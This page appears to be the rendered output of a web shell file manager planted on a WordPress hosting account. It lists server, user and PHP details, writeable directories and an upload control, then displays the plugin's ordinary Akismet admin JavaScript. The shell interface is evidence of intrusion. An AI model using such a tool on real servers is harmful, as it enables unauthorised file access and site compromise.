Server : LiteSpeed
System : Linux server64.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
User : nimalaab ( 3358)
PHP Version : 8.1.32
Disable Function : NONE
Directory :  /home/nimalaab/public_html/wp-content/plugins/akismet/_inc/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]


Current File : /home/nimalaab/public_html/wp-content/plugins/akismet/_inc/akismet-admin.js
jQuery( function ( $ ) {
	$( document ).ready(function() {		
		// Main settings form - enable submit button when something in the form is changed
		var submitButton = $( '#akismet-settings-form #submit' );

		submitButton.prop( 'disabled', true );
		
		$( '#akismet-settings-form input' ).change( function() {
			submitButton.prop( 'disabled', false );
		} );
		
		$( '#akismet-settings-form input[type="text"]' ).keyup( function() {
			submitButton.prop( 'disabled', false );
		} );

		// Prevent aggressive iframe caching in Firefox
		var statsIframe = document.getElementById( 'stats-iframe' );
		if ( statsIframe ) {
			statsIframe.contentWindow.location.href = statsIframe.src;
		}
	});	 
} );

F1le Man4ger